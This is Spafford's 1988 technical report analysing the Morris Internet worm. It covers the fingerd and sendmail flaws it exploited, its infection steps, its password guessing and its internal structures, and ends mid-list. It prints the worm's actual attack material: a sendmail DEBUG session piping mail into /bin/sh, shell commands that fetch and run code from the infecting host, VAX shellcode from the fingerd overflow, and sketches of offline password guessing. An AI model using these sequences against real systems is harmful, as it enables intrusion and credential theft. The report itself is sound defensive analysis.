-
-
- The Internet Worm Program: An Analysis
-
- Purdue Technical Report CSD-TR-823
-
- Eugene H. Spafford
- Department of Computer Sciences Purdue University
- West Lafayette, IN 47907-2004
-
- spaf@cs.purdue.edu
-
-
- ABSTRACT
- On the evening of 2 November 1988, someone infected the Internet
- with a worm program. That program exploited flaws in utility
- programs in systems based on BSD-derived versions of UNIX. The
- flaws allowed the program to break into those machines and copy
- itself, thus infecting those systems. This infection eventually
- spread to thousands of machines, and disrupted normal activities
- and Internet connectivity for many days. This report gives a
- detailed description of the components of the worm
- program: its data and functions. It is based on study of two
- completely independent reverse-compilations of the worm and a
- version disassembled to VAX assembly language. Almost no source
- code is given in the paper because of current concerns about the
- state of the ``immune system'' of Internet hosts, but the
- description should be detailed enough to allow the reader to
- understand the behavior of the program. The paper contains a
- review of the security flaws exploited by the worm program, and
- gives some recommendations on how to eliminate or mitigate their
- future use. The report also includes an analysis of the coding
- style and methods used by the author(s) of the worm, and draws
- some conclusions about his abilities and intent.
-
- Copyright 1988 by Eugene H. Spafford. All rights reserved.
-
- Permission is hereby granted to make copies of this work, without
- charge, solely for the purposes of instruction and research. Any
- such copies must include a copy of this title page and copyright
- notice. Any other reproduction, publication, or use is strictly
- prohibited without express written permission.
-
- November 29, 1988
-
- 1. Introduction
- On the evening of 2 November 1988 the Internet came under attack
- from within. Sometime around 6 PM EST, a program was executed on
- one or more hosts connected to the Internet. This program
- collected host, network, and user information, then broke into
- other machines using flaws present in those systems' software.
- After breaking in, the program would replicate itself and the
- replica would also attempt to infect other systems. Although the
- program would only infect Sun Microsystems Sun 3 systems and VAX
- computers running variants of 4 BSD UNIX, the program spread
- quickly, as did the confusion and consternation of system
- administrators and users as they discovered that their systems
- had been infected. Although UNIX has long been known to have some
- security weaknesses (cf. [Ritc79], [Gram84], and [Reid87]), the
- scope of the break-ins came as a great surprise to almost
- everyone. The program was mysterious to users at sites where it
- appeared. Unusual files were left in the /usr/tmp directories of
- some machines, and strange messages appeared in the log files of
- some of the utilities, such as the sendmail mail handling agent.
- The most noticeable effect, however, was that systems became more
- and more loaded with running processes as they became repeatedly
- infected. As time went on, some of these machines became so
- loaded that they were unable to continue any processing; some
- machines failed completely when their swap space or process
- tables were exhausted. By late Thursday night, personnel at the
- University of California at Berkeley and at Massachusetts
- Institute of Technology had ``captured'' copies of the program
- and began to analyze it. People at other sites also began to
- study the program and were developing methods of eradicating it.
- A common fear was that the program was somehow tampering with
- system resources in a way that could not be readily detected and
- that while a cure was being sought, system files were being
- altered or information destroyed. By 5 AM EST Thursday morning,
- less than 12 hours after the infection started on the network,
- the Computer Systems Research Group at Berkeley had developed an
- interim set of steps to halt its spread. This included a
- preliminary patch to the sendmail mail agent, and the suggestion
- to rename one or both of the C compiler and loader to prevent
- their use. These suggestions were published in mailing lists and
- on the usenet, although their spread was hampered by systems
- disconnecting from the Internet to attempt a ``quarantine.''
- By about 7 PM EST Thursday, another simple, effective method of
- stopping the infection, without renaming system utilities, was
- discovered at Purdue and also widely published. Software patches
- were posted by the Berkeley group at the same time to mend all
- the flaws that enabled the program to invade systems. All that
- remained was to analyze the code that caused the problems. On
- November 8, the National Computer Security Center held a
- hastily-convened workshop in Baltimore. The topic of discussion
- was the program and what it meant to the Internet community. Who
- attended that meeting, why they were invited, and the topics
- discussed have not yet been made public.
-
- However, one thing we do know is that those present at the
- meeting decided not to distribute copies of their
- reverse-engineered code to the general public. It was felt that
- the program exploited too many little-known techniques and that
- making it generally available would only provide other attackers
- a framework to build another such program. Although such a stance
- is well-intended, it can serve only as a delaying tactic. As of
- November 27, I am aware of at least five versions of the
- decompiled code, and because of the widespread distribution of
- the binary, I am sure there are at least ten times that many
- versions already completed or in progress. The required skills
- and tools are too readily available within the community to
- believe that only a few groups have the capability to reconstruct
- the source code. Many system administrators, programmers, and
- managers are interested in how the program managed to establish
- itself on their systems and spread so quickly. These individuals
- have valid interest in seeing the code, especially if they are
- software vendors. Their interest is not to duplicate the program,
- but to be sure that all the holes used by the program are
- properly plugged. Furthermore, examining the code may help
- administrators and vendors develop defenses against future
- attacks, despite the claims to the contrary by some of the
- individuals with copies of the reverse-engineered code. This
- report is intended to serve an interim role in this process. It
- is a detailed description of how the program works, but does not
- provide source code that could be used to create a new worm
- program. As such, this should be an aid to those individuals
- seeking a better understanding of how the code worked, yet it is
- in such a form that it cannot be used to create a new worm
- without considerable effort. Section 3 and Appendix C contain
- specific observations about some of the flaws in the system
- exploited by the program, and their fixes. A companion report, to
- be issued in a few weeks, will contain a history of the worm's
- spread through the Internet. This analysis is the result of a
- study performed on three separate reverse-engineered versions of
- the worm code. Two of these versions are in C code, and one in
- VAX assembler. All three agree in all but the most minor details.
- One C version of the code compiles to binary that is identical to
- the original code, except for minor differences of no
- significance. As such, I can state with some certainty that if
- there was only one version of the worm program, then it was
- benign in intent. The worm did not write to the file system
- except when transferring itself into a target system. It also did
- not transmit any information from infected systems to any site,
- other than copies of the worm program itself. Since the Berkeley
- Computer Systems Research Group has already published official
- fixes to the flaws exploited by the program, we do not have to
- worry about these specific attacks being used again. Many vendors
- have also issued appropriate patches. It now remains to convince
- the remaining vendors to issue fixes, and users to install them.
-
- 2. Terminology
-
- There seems to be considerable variation in the names applied to
- the program described in this paper. I use the term worm instead
- of virus based on its behavior. Members of the press have used
- the term virus, possibly because their experience to date has
- been only with that form of security problem. This usage has been
- reinforced by quotes from computer managers and programmers also
- unfamiliar with the terminology. For purposes of clarifying the
- terminology, let me define the difference between these two terms
- and give some citations to their origins: A worm is a program that
- can run by itself and can propagate a fully working version of
- itself to other machines. It is derived from the word tapeworm, a
- parasitic organism that lives inside a host and saps its
- resources to maintain itself. A virus is a piece of code that adds
- itself to other programs, including operating systems. It cannot
- run independently and it requires that its ``host'' program be
- run to activate it. As such, it has a clear analog to biological
- viruses and those viruses are not considered alive in the usual
- sense; instead, they invade host cells and corrupt them, causing
- them to produce new viruses. The program that was loosed on the
- Internet was clearly a worm.
-
- 2.1. Worms
-
- The concept of a worm program that spreads itself from machine to
- machine was apparently first described by John Brunner in 1975
- in his classic science fiction novel The Shockwave Rider.
- [Brun75] He called these programs tapeworms that lived
- ``inside'' the computers and spread themselves to other
- machines. In 1979-1981, researchers at Xerox PARC built and
- experimented with worm programs. They reported their experiences
- in an article in 1982 in Communications of the ACM. [Shoc82] The
- worms built at PARC were designed to travel from machine to
- machine and do useful work in a distributed environment. They
- were not used at that time to break into systems, although some
- did ``get away'' during the tests. A few people seem to prefer to
- call the Internet Worm a virus because it was destructive, and
- they believe worms are non-destructive. Not everyone agrees that
- the Internet Worm was destructive, however. Since intent and
- effect are sometimes difficult to judge, using those as a naming
- criterion is clearly insufficient. As such, worm continues to be
- the clear choice to describe this kind of program.
-
- 2.2. Viruses
-
- The first use of the word virus (to my knowledge) to describe
- something that infects a computer was by David Gerrold in his
- science fiction short stories about the G.O.D. machine. These
- stories were later combined and expanded to form the book
- When Harlie Was One. [Gerr72] (A subplot in that book described a
- program named VIRUS created by an unethical scientist. A
- computer infected with VIRUS would randomly dial the phone until
- it found another computer. It would then break into that system
- and infect it with a copy of VIRUS. This program would infiltrate
- the system software and slow the system down so much that it
- became unusable except to infect other machines). The inventor
- had plans to sell a program named VACCINE that could cure VIRUS
- and prevent infection, but disaster occurred when noise on a
- phone line caused VIRUS to mutate so VACCINE ceased to be
- effective. The term computer virus was first used in a formal
- way by Fred Cohen at USC. [Cohe84] He defined the term to mean
- a security problem that attaches itself to other code and turns
- it into something that produces viruses; to quote from his
- paper: ``We define a computer `virus' as a program that can
- infect other programs by modifying them to include a possibly
- evolved copy of itself.'' He claimed the first computer virus was
- ``born'' on November 3, 1983, written by himself for a security
- seminar course.
-
- The interested reader may also wish to consult [Denn88] and
- [Dewd85] for further discussion of the terms.
-
- 3. Flaws and Misfeatures
-
- 3.1. Specific Problems
-
- The actions of the Internet Worm exposed some specific security
- flaws in standard services provided by BSD-derived versions of
- UNIX. Specific patches for these flaws have been widely
- circulated in the days since the worm program attacked the Internet.
- Those flaws and patches are discussed here.
-
- 3.1.1. fingerd and gets
-
- The finger program is a utility that allows users to obtain
- information about other users. It is usually used to identify
- the full name or login name of a user, whether or not a user is
- currently logged in, and possibly other information about the
- person such as telephone numbers where he or she can be reached.
- The fingerd program is intended to run as a daemon, or background
- process, to service remote requests using the finger protocol.
- [Harr77] The bug exploited to break fingerd involved overrunning
- the buffer the daemon used for input. The standard C library has
- a few routines that read input without checking for bounds on
- the buffer involved. In particular, the gets call takes input to
- a buffer without doing any bounds checking; this was the call
- exploited by the worm. The gets routine is not the only routine
- with this flaw. The family of routines scanf/fscanf/sscanf may
- also overrun buffers when decoding input unless the user
- explicitly specifies limits on the number of characters to be
- converted. Incautious use of the sprintf routine can overrun
- buffers. Use of the strcat/strcpy calls instead of the
- strncat/strncpy routines may also overflow their buffers.
- Although experienced C programmers are aware of the problems with
- these routines, they continue to use them. Worse, their format
- is in some sense codified not only by historical inclusion in
- UNIX and the C language, but more formally in the forthcoming
- ANSI language standard for C. The hazard with these calls is
- that any network server or privileged program using them may
- possibly be compromised by careful precalculation of the
- inappropriate input. An important step in removing this hazard
- would be first to develop a set of replacement calls that accept
- values for bounds on their program-supplied buffer arguments.
- Next, all system servers and privileged applications should be
- examined for unchecked uses of the original calls, with those
- calls then being replaced by the new bounded versions. Note that
- this audit has already been performed by the group at Berkeley;
- only the fingerd and timed servers used the gets call, and
- patches to fingerd have already been posted. Appendix C contains
- a new version of fingerd written specifically for this report
- that may be used to replace the original version. This version
- makes no calls to gets.
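-
- As an illustration of such a bounded replacement, the following
- sketch reads one request line with the standard fgets routine
- instead of gets. It is only an example written for this
- discussion, not the replacement fingerd of Appendix C, and the
- routine name is invented:
-
- #include <stdio.h>
- #include <string.h>
-
- /* Read one request line into a fixed-size buffer without overflow;
-    fgets() stops after size-1 characters, unlike gets(). */
- static int read_request(char *buf, size_t size, FILE *in)
- {
-     if (fgets(buf, (int) size, in) == NULL)
-         return -1;                      /* EOF or read error          */
-     buf[strcspn(buf, "\r\n")] = '\0';   /* strip the CRLF finger sends */
-     return 0;
- }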
-
- 3.1.2. Sendmail
-
- The sendmail program is a mailer designed to route mail in a
- heterogeneous internetwork. [Allm83] The program operates in a
- number of modes, but the one of most interest is when it is
- operating as a daemon process. In this mode, the program is
- ``listening'' on a TCP port (#25) for attempts to deliver
- mail using standard Internet protocols, principally SMTP
- (Simple Mail Transfer Protocol). [Post82] When such a request
- is detected, the daemon enters into a dialog with the remote
- mailer to determine sender, recipient, delivery instructions, and
- message contents. The bug exploited in sendmail had to do with
- functionality provided by a debugging option in the code. The
- worm would issue the DEBUG command to sendmail and then specify
- a set of commands instead of a user address as the recipient of
- the message. Normally, this is not allowed, but it is present
- in the debugging code to allow testers to verify that mail is
- arriving at a particular site without the need to activate the
- address resolution routines. The debug option of sendmail is
- often used because of the complexity of configuring the mailer
- for local conditions, and many vendors and site administrators
- leave the debug option compiled in. The sendmail program is of
- immense importance on most Berkeley-derived (and other) UNIX
- systems because it handles the complex tasks of mail routing and
- delivery. Yet, despite its importance and wide-spread use, most
- system administrators know little about how it works. Stories
- are often related about how system administrators will attempt to
- write new device drivers or otherwise modify the kernel of the
- OS, yet they will not willingly attempt to modify sendmail or
- its configuration files. It is little wonder, then, that bugs
- are present in sendmail that allow unexpected behavior. Other
- flaws have been found and reported now that attention has been
- focused on the program, but it is not known for sure if all the
- bugs have been discovered and all the patches circulated. One
- obvious approach would be to dispose of sendmail and come up
- with a simpler program to handle mail. Actually, for purposes
- of verification, developing a suite of cooperating programs
- would be a better approach, and more aligned with the UNIX
- philosophy. In effect, sendmail is fundamentally flawed, not
- because of anything related to function, but because it is too
- complex and difficult to understand.
-
- The Berkeley Computer Systems Research Group has a new version of
- sendmail with many bug fixes and fixes for security flaws. This
- version of sendmail is available for FTP from the host
- ``ucbarpa.berkeley.edu'' and will be present in the file
- ~ftp/pub/sendmail.tar.Z by the end of November 1988. Note that
- this version is shipped with the DEBUG option disabled by
- default. However, this does not help system administrators who
- wish to enable the DEBUG option, although the researchers at
- Berkeley believe they have fixed all the security flaws
- inherent in that facility. One approach that could be taken with
- the program would be to have it prompt the user for the password
- of the super user (root) when the DEBUG command is given. A
- static password should never be compiled into the program because
- this would mean that the same password might be present at
- multiple sites and seldom changed. For those sites without
- access to FTP or otherwise unable to obtain the new version, the
- official patches to sendmail are enclosed in Appendix D.
-
- 3.2. Other Problems
-
- Although the worm exploited flaws in only two server programs,
- its behavior has served to illustrate a few fundamental problems
- that have not yet been widely addressed. In the interest of
- promoting better security, some of these problems are discussed
- here. (The interested reader is directed to works such as
- [Gram84] for a broader discussion of related issues.)
-
- 3.2.1. Servers in general
-
- A security flaw not exploited by the worm, but now becoming
- obvious, is that many system services have configuration and
- command files owned by the same userid. Programs like sendmail,
- the at service, and other facilities are often all owned by the
- same non-user id. This means that if it is possible to abuse
- one of the services, it might be possible to abuse many. One way
- to deal with the general problem is have every daemon and
- subsystem run with a separate userid. That way, the command and
- data files for each subsystem could be protected in such a way
- that only that subsystem could have write (and perhaps read)
- access to the files. This is effectively an implementation of
- the principle of least privilege. Although doing this might add
- an extra dozen user ids to the system, it is a small cost to
- pay, and is already supported in the UNIX paradigm. Services
- that should have separate ids include sendmail, news, at,
- finger, ftp, uucp and YP.
-
- 3.2.2. Passwords
-
- A key attack of the worm program involved attempts to discover
- user passwords. It was able to determine success because the
- encrypted password of each user was in a publicly readable file.
- This allows an attacker to encrypt lists of possible passwords
- and then compare them against the actual passwords without
- passing through any system function. In effect, the security of
- the passwords is provided in large part by the prohibitive effort
- of trying all combinations of letters. Unfortunately, as machines
- get faster, the cost of such attempts decreases. Dividing the
- task among multiple processors further reduces the time needed to
- decrypt a password. It is currently feasible to use a
- supercomputer to precalculate all probable passwords and store
- them on optical media. Although not (currently) portable, this
- scheme would allow someone with the appropriate resources access
- to any account for which they could read the password field and
- then consult their database of pre-encrypted passwords. As the
- density of storage media increases, this problem will only get
- more severe. A clear approach to reducing the risk of such
- attacks, and an approach that has already been taken in some
- variants of UNIX, would be to have a shadow password file. The
- encrypted passwords are saved in a file that is readable only by
- the system administrators, and a privileged call performs
- password encryptions and comparisons with an appropriate delay
- (.5 to 1 second, for instance). This would prevent any attempt
- to ``fish'' for passwords. Additionally, a threshold could be
- included to check for repeated password attempts from the same
- process, resulting in some form of alarm being raised. Shadow
- password files should be used in combination with encryption
- rather than in place of such techniques, however, or one problem
- is simply replaced by a different one; the combination of the
- two methods is stronger than either one alone. Another way to
- strengthen the password mechanism would be to change the utility
- that sets user passwords. The utility currently makes minimal
- attempt to ensure that new passwords are nontrivial to guess. The
- program could be strengthened in such a way that it would reject
- any choice of a word currently in the on-line dictionary or based
- on the account name.
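-
- To illustrate why a publicly readable encrypted password invites
- this off-line attack, the following sketch checks one candidate
- word with the standard crypt routine. The helper name is invented
- and the fragment is not taken from the worm:
-
- #include <string.h>
- #include <unistd.h>   /* declares crypt() on many BSD-derived systems;
-                          some systems need <crypt.h> and -lcrypt      */
-
- /* "encrypted" is the 13-character field from /etc/passwd, "guess"
-    a candidate word; no system authentication call is involved. */
- static int guess_matches(const char *guess, const char *encrypted)
- {
-     char salt[3];
-     const char *enc;
-
-     salt[0] = encrypted[0];     /* classic crypt: first two characters */
-     salt[1] = encrypted[1];     /* of the stored field are the salt    */
-     salt[2] = '\0';
-     enc = crypt(guess, salt);
-     return enc != NULL && strcmp(enc, encrypted) == 0;
- }
-
- A guessing program need only loop such a check over a word list;
- because no login attempt is made, no system delay or alarm is
- triggered.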
-
- 4. High-Level Description of the Worm
-
- This section contains a high-level overview of how the worm
- program functions. The description in this section assumes that
- the reader is familiar with UNIX and somewhat familiar with
- network facilities under UNIX. Section 5 describes the individual
- functions and structures in more detail. The worm consists of
- two parts: a main program, and a bootstrap or vector program
- (described in Appendix B). We will start our description from
- the point at which a host is about to be infected. At this
- point, a worm running on another machine has either succeeded in
- establishing a shell on the new host and has connected back to
- the infecting machine via a TCP connection, or it has connected
- to the SMTP port and is transmitting to the sendmail program.
- The infection proceeded as follows:
-
- 1) A socket was established on the infecting machine for the vector
- program to connect to (e.g., socket number 32341). A challenge
- string was constructed from a random number (e.g., 8712440). A file
- name base was also constructed using a random number (e.g.,
- 14481910).
-
- 2) The vector program was installed and executed using one of two
- methods:
-
- 2a) Across a TCP connection to a shell, the worm would send the
- following commands (the two lines beginning with ``cc'' were sent
- as a single line):
-
- PATH=/bin:/usr/bin:/usr/ucb
- cd /usr/tmp
- echo gorch49;sed '/int zz/q' > x14481910.c;echo gorch50
- [text of vector program, enclosed in Appendix B]
- int zz;
- cc -o x14481910 x14481910.c;./x14481910 128.32.134.16 32341 8712440;
- rm -f x14481910 x14481910.c;echo DONE
-
- Then it would wait for the string ``DONE'' to signal that the
- vector program was running.
-
- 2b) Using the SMTP connection, it would transmit (the two lines
- beginning with ``cc'' were sent as a single line):
-
- debug
- mail from: </dev/null>
- rcpt to: <"|sed -e '1,/^$/'d | /bin/sh ; exit 0">
- data
- cd /usr/tmp
- cat > x14481910.c <<'EOF'
- [text of vector program, enclosed in Appendix B]
- EOF
- cc -o x14481910 x14481910.c;x14481910 128.32.134.16 32341 8712440;
- rm -f x14481910 x14481910.c
- .
- quit
-
- The infecting worm would then wait for up to 2 minutes on the
- designated port for the vector to contact it.
-
- 3) The vector program then connected to the ``server,'' sent the
- challenge string, and transferred three files: a Sun 3 binary
- version of the worm, a VAX version, and the source code for the
- vector program. After the files were copied, the running vector
- program became (via the execl call) the shell with its input and
- output still connected to the server worm.
-
- 4) The server worm sent the following command stream to the
- connected shell:
-
- PATH=/bin:/usr/bin:/usr/ucb
- rm -f sh
- if [ -f sh ]
- then
- P=x14481910
- else
- P=sh
- fi
-
- Then, for each binary file it had transferred (just two in this
- case, although the code is written to allow more), it would send
- the following form of command sequence:
-
- cc -o $P x14481910,sun3.o
- ./$P -p $$ x14481910,sun3.o x14481910,vax.o x14481910,l1.c
- rm -f $P
-
- The rm would succeed only if the linked version of the worm
- failed to start execution. If the server determined that the
- host was now infected, it closed the connection. Otherwise, it
- would try the other binary file. After both binary files had been
- tried, it would send over rm commands for the object files to
- clear away all evidence of the attempt at infection.
-
- 5) The new worm on the infected host proceeded to ``hide'' itself by
- obscuring its argument vector, unlinking the binary version of
- itself, and killing its parent (the $$ argument in the
- invocation). It then read into memory each of the worm binary
- files, encrypted each file after reading it, and deleted the
- files from disk.
-
- 6) Next, the new worm gathered information
- about network interfaces and hosts to which the local machine
- was connected. It built lists of these in memory, including
- information about canonical and alternate names and addresses.
- It gathered some of this information by making direct
- ioctl calls, and by running the netstat program with various
- arguments. It also read through various system files looking for
- host names to add to its database.
-
- 7) It randomized the lists
- it constructed, then attempted to infect some of those hosts. For
- directly connected networks, it created a list of possible host
- numbers and attempted to infect those hosts if they existed.
- Depending on the type of host (gateway or local network), the
- worm first tried to establish a connection on the telnet or rexec
- ports to determine reachability before it attempted one of the
- infection methods.
-
- 8) The infection attempts proceeded by one of three routes: rsh,
- fingerd, or sendmail.
-
- 8a) The attack via rsh was done by attempting to spawn a remote
- shell by invocation of (in order of trial) /usr/ucb/rsh,
- /usr/bin/rsh, and /bin/rsh. If successful, the host was infected
- as in steps 1 and 2a, above.
-
- 8b) The attack via the finger daemon was somewhat
- more subtle. A connection was established to the remote finger
- server daemon and then a specially constructed string of 536
- bytes was passed to the daemon, overflowing its input buffer and
- overwriting parts of the stack. For standard 4 BSD versions
- running on VAX computers, the overflow resulted in the return
- stack frame for the main routine being changed so that the
- return address pointed into the buffer on the stack. The
- instructions that were written into the stack at that location
- were:
-
- pushl $68732f     '/sh\0'
- pushl $6e69622f   '/bin'
- movl  sp, r10
- pushl $0
- pushl $0
- pushl r10
- pushl $3
- movl  sp, ap
- chmk  $3b
-
- That is, the code executed when the main routine attempted to
- return was: execve("/bin/sh", 0, 0). On VAXen, this resulted in
- the worm being connected to a remote shell via the TCP connection.
- The worm then proceeded to infect the host as in steps 1 and 2a,
- above. On Suns, this simply resulted in a core file since the code
- was not in place to corrupt a Sun version of fingerd in a similar
- fashion.
-
- 8c) The worm then tried to infect the remote host by establishing
- a connection to the SMTP port and mailing an infection, as in step
- 2b, above.
-
- Not all the steps were attempted. As soon as one method succeeded,
- the host entry in the internal list was marked as infected and the
- other methods were not attempted.
-
- 9) Next, it entered a state machine consisting of five states.
- Each state was run for a short while, then the program looped back
- to step #7 (attempting to break into other hosts via sendmail,
- finger, or rsh). The first
- four of the five states were attempts to break into user
- accounts on the local machine. The fifth state was the final
- state, and occurred after all attempts had been made to break
- all passwords. In the fifth state, the worm looped forever
- trying to infect hosts in its internal tables and marked as not
- yet infected. The four states were:
-
- 9a) The worm read through
- the /etc/hosts.equiv files and /.rhosts files to find the names
- of equivalent hosts. These were marked in the internal table of
- hosts. Next, the worm read the /etc/passwd file into an internal
- data structure. As it was doing this, it also examined
- the .forward file in each user home directory and included those
- host names in its internal table of hosts to try. Oddly, it did
- not similarly check user .rhosts files.
-
- 9b) The worm attempted
- to break each user password using simple choices. The worm
- checked the obvious case of no password. Then, it used the
- account name and GECOS field to try simple passwords. Assume
- that the user had an entry in the password file like:
-
- account:abcedfghijklm:100:5:User, Name:/usr/account:/bin/sh
-
- Then the words tried as potential passwords would be account,
- accountaccount, User, Name, user, name, and tnuocca. These are,
- respectively, the account name, the account name concatenated
- with itself, the first and last names of the user, the user
- names with leading capital letters turned to lower case, and the
- account name reversed. (A small sketch of this guess construction
- appears at the end of this section.) Experience described in
- [Gram84] indicates that on systems where users are naive about
- password security, these choices may work for up to 30% of user
- passwords. Step 10 in this section describes what was done if a
- password ``hit'' was achieved.
-
- 9c) The third stage in the process involved trying to break the
- password of each user by trying each word present in an internal
- dictionary of words (see Appendix A). This dictionary of 432 words
- was tried against each account in a random order, with ``hits''
- being handled as described in step 10, below.
-
- 9d) The fourth stage was entered
- if all other attempts failed. For each word in the file
- /usr/dict/words, the worm would see if it was the password to any
- account. In addition, if the word in the dictionary began with an
- upper case letter, the letter was converted to lower case and
- that word was also tried against all the passwords.
-
- 10) Once a
- password was broken for any account, the worm would attempt to
- break into remote machines where that user had accounts. The
- worm would scan the .forward and .rhosts files of the user at
- this point, and identify the names of remote hosts that had
- accounts used by the target user. It then attempted two attacks:
-
- 10a) The worm would first attempt to create a remote shell using
- the rexec service. The attempt would be made using the account
- name given in the .forward or .rhosts file and the user's local
- password. This took advantage of the fact that users often have
- the same password on their accounts on multiple machines.
-
- 10b) The worm would do a rexec to the current host (using the
- local user name and password) and would try an rsh command to the
- remote host using the username taken from the file. This attack
- would succeed in those cases where the remote machine had a
- hosts.equiv file or the user had a .rhosts file that allowed
- remote execution without a password. If the remote shell was
- created either way, the attack would continue as in steps 1 and
- 2a, above. No other use was made of the user password.
- Throughout the execution of the main loop, the worm would check
- for other worms running on the same machine. To do this, the worm
- would attempt to connect to another worm on a local,
- predetermined TCP socket.
- If such a connection succeeded, one worm would (randomly) set its
- pleasequit variable to 1, causing that worm to exit after it had
- reached partway into the third stage of password cracking. This
- delay is part of the reason many systems had multiple worms
- running: even though a worm would check for other local worms, it
- would defer its self-destruction until significant effort had
- been made to break local passwords. One out of every seven worms
- would become immortal rather than check for other local worms.
- This was probably done to defeat any attempt to put a fake worm
- process on the TCP port to kill existing worms. It also
- contributed to the load of a machine once infected. The worm
- attempted to send a UDP packet to the host ernie.berkeley.edu
- approximately once every 15 infections, based on a random number
- comparison. The code to do this was incorrect, however, and no
- information was ever sent. Whether this was the intended ruse or
- whether there was actually some reason for the byte to be sent is
- not currently known. However, the code is such that an
- uninitialized byte is the intended message. It is possible that
- the author eventually intended to run some monitoring program on
- ernie (after breaking into an account, no doubt). Such a
- program could obtain the sending host number from the single-byte
- message, whether it was sent as a TCP or UDP packet. However, no
- evidence for such a program has been found and it is possible
- that the connection was simply a feint to cast suspicion on
- personnel at Berkeley. The worm would also fork itself on a
- regular basis and kill its parent. This served two purposes.
- First, the worm appeared to keep changing its process id and no
- single process accumulated excessive amounts of cpu time.
- Secondly, processes that have been running for a long time have
- their priority downgraded by the scheduler. By forking, the new
- process would regain normal scheduling priority. This mechanism
- did not always work correctly, either, as we locally observed
- some instances of the worm with over 600 seconds of accumulated
- cpu time. If the worm ran for more than 12 hours, it would flush
- its host list of all entries flagged as being immune or already
- infected. The way hosts were added to this list implies that a
- single worm might reinfect the same machines every 12 hours.
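-
- As a small illustration of the guessing in step 9b, the following
- sketch (all names invented; this is not worm code) prints the
- candidate passwords derived from the example password-file entry
- shown earlier:
-
- #include <stdio.h>
- #include <string.h>
- #include <ctype.h>
-
- static void lowercase(char *s)
- {
-     for (; *s != '\0'; s++)
-         *s = (char) tolower((unsigned char) *s);
- }
-
- /* Candidate passwords derived from one password-file entry: the
-    account name, the name doubled, the first and last names (as
-    given and lower-cased), and the account name reversed. */
- static void build_guesses(const char *acct, const char *first,
-                           const char *last)
- {
-     char buf[256];
-     size_t i, n = strlen(acct);
-
-     printf("%s\n", acct);                       /* account name         */
-     snprintf(buf, sizeof buf, "%s%s", acct, acct);
-     printf("%s\n", buf);                        /* account name doubled */
-     printf("%s\n%s\n", first, last);            /* first and last names */
-     snprintf(buf, sizeof buf, "%s", first);
-     lowercase(buf);
-     printf("%s\n", buf);                        /* lower-cased first    */
-     snprintf(buf, sizeof buf, "%s", last);
-     lowercase(buf);
-     printf("%s\n", buf);                        /* lower-cased last     */
-     for (i = 0; i < n && i < sizeof buf - 1; i++)
-         buf[i] = acct[n - 1 - i];               /* account name reversed */
-     buf[i] = '\0';
-     printf("%s\n", buf);
- }
-
- Called as build_guesses("account", "User", "Name"), this prints the
- seven guesses listed in step 9b.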
-
- 5. A Tour of the Worm
-
- The following is a brief, high-level description of the routines
- present in the worm code. The description covers all the
- significant functionality of the program, but does not describe
- all the auxiliary routines used nor does it describe all the
- parameters or algorithms involved. It should, however, give the
- user a complete view of how the worm functioned.
-
- 5.1. Data Structures
-
- The worm had a few global data structures worth mentioning.
- Additionally, the way it handled some local data is of interest.
-
- 5.1.1. Host list
-
- The worm constructed a linked list of host records. Each record
- contained an array of 12 character pointers to allow storage of
- up to 12 host names/aliases. Each record also contained an array
- of six long unsigned integers for host addresses, and each record
- contained a flag field. The only flag bits used in the code
- appear to be 0x01 (host was a gateway), 0x02 (host has been
- infected), 0x04 (host cannot be infected: not reachable, not
- UNIX, wrong machine type), and 0x08 (host was ``equivalent'' in
- the sense that it appeared in a context like a .rhosts file).
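-
- A plausible C rendering of one such record, with field names
- invented from the description above (not the decompiled
- declarations), is:
-
- /* One entry in the worm's linked list of hosts. */
- struct host {
-     char          *names[12];    /* canonical name plus aliases      */
-     unsigned long  addrs[6];     /* up to six 32-bit host addresses  */
-     int            flags;        /* 0x01 gateway, 0x02 infected,     */
-                                  /* 0x04 immune, 0x08 "equivalent"   */
-     struct host   *next;         /* link to the next host record     */
- };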
-
- 5.1.2. Gateway List
-
- The worm constructed a simple array of gateway IP addresses
- through the use of the system netstat command. These addresses
- were used to infect directly connected networks. The use of the
- list is described in the explanation of scan_gateways and
- rt_init, below.
-
- 5.1.3. Interfaces list
-
- An array of records was filled in with information about each
- network interface active on the current host. This included the
- name of the interface, the outgoing address, the netmask, the
- destination host if the link was point-to-point, and the
- interface flags.
-
-
- 5.1.4. Pwd
-
- A linked list of records was built to hold user information. Each
- structure held the account name, the encrypted password, the
- home directory, the gecos field, and a link to the next record.
- A blank field was also allocated for decrypted passwords as they
- were found.
-
- 5.1.5. objects
-
- The program maintained an array of ``objects'' that held the
- files that composed the worm. Rather than have the files stored
- on disk, the program read the files into these internal
- structures. Each record in the list contained the suffix of the
- file name \(e.g., ``sun3.o''\), the size of the file, and the
- encrypted contents of the file. The use of this structure is
- described below.
-
- 5.1.6. Words
-
- A mini-dictionary of words was present in the worm to use in
- password guessing (see Appendix A). The words were stored in
- an array, and every word was masked (XOR) with the bit pattern
- 0x80. Thus, the dictionary would not show up with an invocation
- of the strings program on the binary or object files.
-
- 5.1.7. Embedded Strings
-
- Every text string used by the program, without exception, was
- masked (XOR) with the bit pattern 0x81. Every time a string
- was referenced, it was referenced via a call to XS. The XS
- function decrypted the requested string in a static circular
- buffer and returned a pointer to the decrypted version. This
- also kept any of the text strings in the program from appearing
- during an invocation of strings. Simply clearing the high order
- bit (e.g., XOR 0x80) or displaying the program binary would
- not produce intelligible text. All references to XS have been
- omitted from the following text; realize that every string was
- so encrypted. It is not evident how the strings were placed in
- the program in this manner. The masked strings were present
- inline in the code, so some preprocessor or a modified version of
- the compiler must have been used. This represents a significant
- effort by the author of the worm, and suggests quite strongly
- that the author wanted to complicate or prevent the analysis of
- the program once it was discovered.
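-
- The effect of XS can be sketched as follows. The function and
- buffer names here are invented, and the worm's actual version used
- a static circular buffer so that several decoded strings could be
- in use at once:
-
- #include <stddef.h>
-
- /* Decode a string masked with 0x81 into a static buffer and return
-    it.  Printable ASCII never XORs to zero under 0x81, so the masked
-    form can remain NUL-terminated for this sketch. */
- static char *xs(const char *masked)
- {
-     static char clear[512];
-     size_t i;
-
-     for (i = 0; masked[i] != '\0' && i < sizeof clear - 1; i++)
-         clear[i] = (char) (masked[i] ^ 0x81);
-     clear[i] = '\0';
-     return clear;
- }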
-
- 5.2. Routines
-
- The descriptions given here are arranged in alphabetic order. The
- names of some routines are exactly as used by the author of the
- code. Other names are based on the function of the routine, and
- those names were chosen because the original routines were
- declared static and name information was not present in the
- object files. If the reader wishes to trace the functional flow
- of the worm, begin with the descriptions of routines main and
- doit (presented first for this reason). By function, the
- routines can be (arbitrarily) grouped as follows: setup and
- utility : main, doit, crypt, h_addaddr, h_addname, h_addr2host,
- h_clean, h_name2host, if_init, loadobject, makemagic, netmaskfor,
